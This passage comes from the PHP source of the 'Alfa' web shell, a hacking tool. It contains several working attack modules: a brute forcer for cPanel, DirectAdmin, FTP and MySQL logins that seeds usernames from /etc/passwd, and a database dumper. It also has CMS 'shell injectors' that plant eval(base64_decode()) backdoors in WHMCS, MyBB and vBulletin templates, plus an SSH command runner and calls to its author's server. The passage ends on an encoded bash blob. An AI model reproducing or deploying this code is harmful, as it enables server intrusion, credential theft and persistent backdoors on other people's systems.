		if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
			$v = trim($colors[$k]);
		}else{
			$v = trim(is_array($v)?$v["key_color"]:$v);
		}
		$array[$k] = $v;
	}
	$file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";
	$config = json_encode($array, JSON_PRETTY_PRINT);
	if(!@file_put_contents($file, $config)){
		echo('<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">'.$config.'</textarea></center></p>');
	}else{
		echo('<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$file.'\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>');
	}
}
if($_POST['alfa2']=='>>'){
	echo __pre();
	$colors = json_decode($_POST["alfa1"],true);
	$array = "";
	$is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;
	$glob_colors = $GLOBALS["__ALFA_COLOR__"];
	foreach($glob_colors as $k => $v){
		if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
			$v = trim($colors[$k]);
		}else{
			$v = trim(is_array($v)?$v["key_color"]:$v);
		}
		$array .= '"'.trim($k).'" => "'.$v.'",';
	}
	@chdir($GLOBALS['home_cwd']);
	$basename = @basename($_SERVER['PHP_SELF']);
	$data = @file_get_contents($basename);
	$color = '/\'color\'(.*?)\),/s';
	if(preg_match($color,$data,$e)){
		$new = "'color' => array(".$array."),";
		$data = str_replace($e[0],$new,$data);
		if(@file_put_contents($basename, $data)){
			echo("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");
		}else{
			echo("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");
		}
	}else{
		echo("<center><p><h3>[-] Error...!</h3></p></center>");
	}
}
}
echo('</div>');
alfafooter();
}
function alfaplus(){
alfahead();
echo '<div class="header"><center><p><div class="txtfont_header">| Alfa + |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'plus\',null,\'news\');">| News | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'tools\')">| Tools | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'about\')">| About Us | </a></h3></center>';
if($_POST['alfa1']=='news'||$_POST['alfa1']=='tools'){
try{
$s1 = 'http://solevisible.com/'.($_POST['alfa1']=='news'?'news.php':'tools.php');
$msg = "<center><font color='red'><b><p>Can`t Connect to Remote Server ...!<br>Please Try Again Later...!</p></b></font></center>";
$news = new AlfaCURL();
if($news->Send($s1)){
$xml = $news->Send($s1);
}else{
$xml = false;
}
if($xml){
if(@simplexml_load_string($xml)){
$doc = new DOMDocument;
$doc->loadXML($xml);
$data = $doc->getElementsByTagName('data')->item(0);
$items = $data->getElementsByTagName('item');
foreach($items as $item){
$title = $item->getElementsByTagName('title')->item(0)->nodeValue;
$description = $item->getElementsByTagName('description')->item(0)->nodeValue;
$link = $item->getElementsByTagName('link')->item(0)->nodeValue;
$pubDate = $item->getElementsByTagName('pubDate')->item(0)->nodeValue;
echo(__pre()."<center><a href='$link' target='_blank'>$title</a><br>$description<br><small><font  color='#FFFFFF'><b>Date: $pubDate</b></font></small></center></pre>");
}
}else{
echo($msg);
}
}else{
echo($msg);
}
}catch(Exception $e){
echo $e->getMessage();
}}elseif($_POST['alfa1']=='about'){
echo __pre()."<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>
<b><font size='+3' color='#00A220'>&#9774; ~ PEACE ~ &#9774;</font><br><b>
<font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>
<font color='#00A220'>Contact : solevisible@gmail.com</font><br>
<font color='#00A220'>Telegram Channel: @solevisible</font><br>
<font color='#FFFFFF'>Skype : ehsan.invisible</font><br>
<font color='#FFFFFF'>Skype : sole.sad</font><br>
<font color='#FF0000'>Persian Gulf For Ever</font><br>
<font color='#FF0000'>Iranian Hackers :)</font><br>
<font color='#FF0000'>Our Friends : Mr.PERSIA , R3veC0der</font><br>
</center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
}
echo('</div>');
alfafooter();
}
function alfaDumper(){
alfahead();
echo('<div class="header">');
AlfaNum(8,9,10);
echo "<center><br><div class='txtfont_header'>| Mysql Database Dumper |</div><br><br>".getConfigHtml('all')."<form method='post' onsubmit=\"g('dumper',null,null,null,this.db_username.value,this.db_password.value,this.db_name.value,this.dfile.value,this.db_host.value); return false;\"><p>";
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Dump Path: ', 'inputName' => 'dfile', 'inputValue' => htmlspecialchars($GLOBALS['cwd']).'alfa.sql', 'inputSize' => '50')
);
create_table($table);
echo "<br><input type='submit' value=' ' name='Submit'></p></form></center>";
$username = ($_POST['alfa3']);
$password = ($_POST['alfa4']);
$dbname = ($_POST['alfa5']);
$dfile = ($_POST['alfa6']);
$host = ($_POST['alfa7']);
if(!empty($dbname)){
echo __pre();
$msg = "<center>Check this :  <font color='red'>".$dfile."</font></center>";
if(@mysqli_connect($host,$username,$password,$dbname)){
if(strlen(alfaEx("mysqldump"))>0){
alfaEx("mysqldump --single-transaction --host=\"$host\" --user=\"$username\" --password=\"$password\" $dbname > '".addslashes($dfile)."'");
echo($msg);
}else{
__alert("Error...!");
}
}else{
echo('<center>mysqli_connect : Error!</center>');
}
}
echo('</div>');
alfafooter();
}
function Alfa_DirectAdmin_Cracker($info){
if(!$info['mysql'])
$url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
else $url = $info['protocol'].$info['target'].'/phpmyadmin';
$curl = curl_init();
curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl, CURLOPT_HEADER,0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
$result = curl_exec($curl);
$curl_errno = curl_errno($curl);
$curl_error = curl_error($curl);
if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){
echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green">  Login Success....</font><br>';
$info['target'] = $url;
CrackerResualt($info);
}
curl_close($curl);
}
function Alfa_CP_Cracker($info){
$url = $info['protocol'].$info['target'].':'.$info['port'];
$curl = curl_init();
curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
curl_setopt($curl, CURLOPT_HEADER,0);
curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
curl_setopt($curl, CURLOPT_URL, $url);
$result = curl_exec($curl);
$curl_errno = curl_errno($curl);
$curl_error = curl_error($curl);
if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
elseif(preg_match('/filemanager/i',$result)){
echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green">  Login Success....</font><br>';
$info['target'] = $url;
CrackerResualt($info);
}
curl_close($curl);
}
function Alfa_FTP_Cracker($info){
$url = $info['protocol'].$info['target'];
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
$result = curl_exec($curl);
$curl_errno = curl_errno($curl);
$curl_error = curl_error($curl);
if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
elseif(preg_match('/(\d+):(\d+)/i',$result)){
echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green">  Login Success....</font><br>';
$info['target'] = $url;
CrackerResualt($info);
}
curl_close($curl);
}
function Alfa_Mysql_Cracker($info){
if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){
CrackerResualt($info);
echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green">  Login Success....</font><br>';
}
}
function Alfa_FTPC($info){
if($con=@ftp_connect($info['target'],$info['port'])){
if($con){
$login=@ftp_login($con,$info['username'],$info['password']);
if($login){CrackerResualt($info);}}}
@ftp_close($con);
}
function CrackerResualt($info){
$res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
$c = @fopen($info['fcrack'],'a+');
@fwrite($c, $res);
@fclose($c);
}
function Alfa_Call_Function_Cracker($method,$info){
switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}
}
function alfaCrackers(){
alfahead();
AlfaNum(9,10);
echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">';
foreach(array('cp'=>'Cpanel','direct'=>'DirectAdmin','ftp'=>'FTP','phpmyadmin'=>'PhpMyAdmin[DirectAdmin]','mysql'=>'mysql_connect()','ftpc'=>'ftp_connect()') as $key=>$val)echo('<option value="'.$key.'">'.$val.'</option>');
echo '</select> Protocol: <select id="protocol" name="protocol">';
foreach(array('https://','http://','ftp://') as $val)echo('<option value="'.$val.'">'.$val.'</option>');
echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
Port: <input id="port" type="text" name="port" value="2083">
<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
<textarea placeholder="Users" rows="20" cols="25" name="usernames">'.($GLOBALS['sys']=='unix'?alfaEx("cut -d: -f1 /etc/passwd"):"").'</textarea>
&nbsp <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
<p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
$target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);
$port = $_POST['alfa2'];
$usernames= $_POST['alfa3'];
$passwords = $_POST['alfa4'];
$fcrack = $_POST['alfa5'];
$cracking = $_POST['alfa6'];
$protocol = $_POST['alfa7'];
$loginpanel = $_POST['alfa8'];
$p = $loginpanel == 'phpmyadmin' ? $p = true : false;
if($cracking=='start'){
echo __pre();
$exuser = explode("\n",$usernames);
$expw = explode("\n",$passwords);
foreach($exuser as $user){
foreach($expw as $pw){
$array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
Alfa_Call_Function_Cracker($loginpanel,$array);
}
}
echo '<br><font color="red">Attack Finished...</font>';
}
echo '</div>';
alfafooter();
}
function alfassh2(){
if(function_exists('ssh2_connect')){
$_SESSION['connected']= false;
$ssh_ip = $_POST['alfa1'];
$ssh_login = $_POST['alfa2'];
$ssh_pass = $_POST['alfa3'];
$ssh_port = $_POST['alfa4'];
$ssh_command = $_POST['alfa5'];
if($alfaconnect2ssh=@ssh2_connect($ssh_ip, $ssh_port))
{
if($alfalogin=@ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass))
{
$_SESSION['connected']= true;
}
}
if($_SESSION['connected']!== true){
alfahead();
echo "<div class=header>";
echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,this.ssh_ip.value,this.ssh_login.value,this.ssh_pass.value,this.ssh_port.value); return false;'><table cellpadding='2' cellspacing='0'><tr><td><font color=\"#ffffff\"><b>IP</b></font></td><td><font color=\"#ffffff\"><b>SSH USER</b></font></td><td><font color=\"#ffffff\"><b>SSH PASS</b></font></td><td><font color=\"#ffffff\"><b>SSH PORT</b></font></td><td></td></tr><tr><td><input type=text name=ssh_ip value=''></td><td><input type=text name=ssh_login value=''></td><td><input type=text name=ssh_pass value=''></td><td><input type=text name=ssh_port value=''></td><td><input type='submit' name='submit' value=' '></td></table></form></div>";
alfafooter();
}
if($_SESSION['connected']==true){
alfahead();
echo "<div class=header>";
echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,\"".$ssh_ip."\",\"".$ssh_login."\",\"".$ssh_pass."\",\"".$ssh_port."\",this.ssh_command.value,\">>\"); return false;'><table cellpadding='2' cellspacing='0'><tr><td><input type=text name=ssh_command value=''></td><td><input type='submit' name='execute' value=' '></td></table></form><form name='ssh2' method='post' onsubmit='g(\'ssh2\',null,\'\',\'\',\'\'); return false;'><input type=submit name='destsession' value='logout'></form>";
$alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command);
stream_set_blocking($alfastream,true);
$output = ssh2_fetch_stream($alfastream,SSH2_STREAM_STDIO);
if($_POST['alfa6']=='>>'){
echo '<pre class=ml1>';
ob_start();
echo  stream_get_contents($output);
echo htmlspecialchars(ob_get_clean());
}
echo "</div>";
alfafooter();
}}else{
alfahead();
echo '<div class=header><p><center><b><font color="red">Server does not support SSH2</font><p></b></center></div>';
alfafooter();
}
}
function output($string){ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$string."'>Click Here !</a></font></b></center><br><br>";}
function alfaShellInjectors(){
alfahead();
echo '<div class=header>';
AlfaNum(11);
echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
$selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){
AlfaNum();
echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
);
create_table($table);
echo $selector;
echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
if(isset($_POST['alfa6'])) {
$dbu = $_POST['alfa6'];
$dbn = $_POST['alfa7'];
$dbp = $_POST['alfa8'];
$dbh = $_POST['alfa9'];
$path = $_POST['alfa10'];
$method = $_POST['alfa4'];
$index = "{php}".ALFA_UPLOADER.";{/php}";
$newin = str_replace("'","\'",$index);
$newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){
if(filter_var($path,FILTER_VALIDATE_URL)){
$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
$soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
$soleGet = mysqli_fetch_assoc($soleSave);
$tempSave1 = $soleGet['message'];
$tempSave = str_replace("'","\'",$tempSave1);
$inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
$result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
$result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
if(function_exists('curl_version') && $method == 'auto'){
$AlfaSole = new AlfaCURL(true);
$saveurl = $AlfaSole->Send($path."/pwreset.php");
$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
__alert("shell injectet...");
$ff= 'http://'.$path."/solevisible.php";
output($ff);}else{
echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert('Path is not Valid...');}}}
}if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){
AlfaNum(1,2,3,5);
echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>
";
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')
);
create_table($table);
echo $selector;
echo "<p><input type=submit value=' '></p></form></center></center>";
if(isset($_POST['alfa6'])) {
$dbu = $_POST['alfa6'];
$dbn = $_POST['alfa7'];
$dbp = $_POST['alfa8'];
$dbh = $_POST['alfa9'];
$prefix = $_POST['alfa10'];
$method = $_POST['alfa4'];
$shellCode = "{\${".ALFA_UPLOADER."}}";
$newinshell = str_replace("'","\'",$shellCode);
if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){
$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
$inject = "select template from {$prefix}templates where  title= 'calendar'";
$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
$GetTemp = mysqli_fetch_assoc($result);
$saveDate = $GetTemp['template'];
$repsave = str_replace($shellCode,"",$saveDate);
$repsave = str_replace("'","\'",$repsave);
$createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
$geturl = "select value from {$prefix}settings where name= 'bburl'";
$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
$rowb = mysqli_fetch_assoc($findurl);
$furl = $rowb['value'];
$realurl = parse_url($furl,PHP_URL_HOST);
$realpath = parse_url($furl,PHP_URL_PATH);
$res = false;
$AlfaCurl = new AlfaCURL();
if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){
if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
@fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
@fputs($fsock, "HOST: $realurl\r\n");
@fputs($fsock, "Connection: close\r\n\r\n");
$check = fgets($fsock);
if(preg_match("/200 OK/i",$check)){
$repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}
@fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){
$AlfaCurl->Send($realurl.$realpath."/calendar.php");
$res = true;
}
if($res){
$ff = 'http://'.$realurl.$realpath."/solevisible.php";
output($ff);
}else{
$ff = 'http://'.$realurl.$realpath."/calendar.php";
$fff = 'http://'.$realurl.$realpath."/solevisible.php";
echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";
}}}}
if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){
AlfaNum(1,2,7,9,10);
echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
$table = array('td1' =>
 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
 'td2' =>
 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),
 'td3' =>
 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),
 'td4' =>
 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),
 'td5' =>
 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')
);
create_table($table);
echo $selector;
echo '<p><input type="submit" value=" " /></p></form></center>';
if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){
$method = $_POST['alfa8'];
$code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
$conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_error($conn));
$rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='faq'";
$recivedata = @mysqli_query($conn,$rec);
$getd = @mysqli_fetch_assoc($recivedata);
$savetoass = $getd['template'];
$code = str_replace("'","\'",$code);
$p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='faq'";
$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
$geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
$getval = @mysqli_fetch_assoc($geturl);
$saveval = $getval['value'];
$realurl = parse_url($saveval,PHP_URL_HOST);
$realpath = parse_url($saveval,PHP_URL_PATH);
$res = false;
$AlfaCurl = new AlfaCURL();
if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){
if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
@fputs($fsock, "GET $realpath/faq.php HTTP/1.1\r\n");
@fputs($fsock, "HOST: $realurl\r\n");
@fputs($fsock, "Connection: close\r\n\r\n");
$check = fgets($fsock);
if(preg_match("/200 OK/i",$check)){
$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
$res = true;
}
@fclose($fsock);
}
}elseif(function_exists('curl_version') && $method == 'auto'){
$AlfaCurl->Send($realurl.$realpath."/faq.php");
$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
$res = true;
}
if($res){
$ff = 'http://'.$realurl.$realpath."/solevisible.php";
output($ff);
}else{
$ff = 'http://'.$realurl.$realpath."/faq.php";
$fff = 'http://'.$realurl.$realpath."/solevisible.php";
echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";}}}
echo '</div>';
alfafooter();
}
function alfaupdatepath(){
	if($_POST['path']!=''){
		$_SESSION[__LAST_CWD__] = $_POST['path'];
	}
	echo($_SESSION[__LAST_CWD__]);
}
function alfacheckfiletype(){
	$path = $_POST['path'];
	$arg = $_POST['arg'];
	if(@is_file($path.'/'.$arg)){
		echo("file");
	}else{
		echo("dir");
	}
}
function alfacheckupdate(){
	if(!isset($_COOKIE['alfa_checkupdate'])){
		if(function_exists("curl_version")){
			$update = new AlfaCURL();
			$json = $update->Send("http://solevisible.com/update.json");
			$json = @json_decode($json);
			if($json){
				if(__ALFA_VERSION__ != $json->version){
					@setcookie("alfa_checkupdate", "1", time()+86400);
					echo('<div class="update-holder"><div class="update-partner"><div class="update-content"><div onClick="document.getElementsByClassName(\'update-holder\')[0].style.display = \'none\';" class="update-close">X</div><a href="'.$json->url.'" target="_blank">'.$json->text.'<br> Version: '.$json->version.'</a></div></div></div>');
				}
			}
		}
	}
}
function alfaWriteTocgiapi($name, $source){
	@chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
	@mkdir('alfacgiapi',0755);
	__write_file("alfacgiapi/".$name, __get_resource($source));
	@chmod("alfacgiapi/".$name, 0755);
}
function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}
function alfaupdateheader(){
	if(!isset($_SESSION["updateheader_data"])){
		$bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
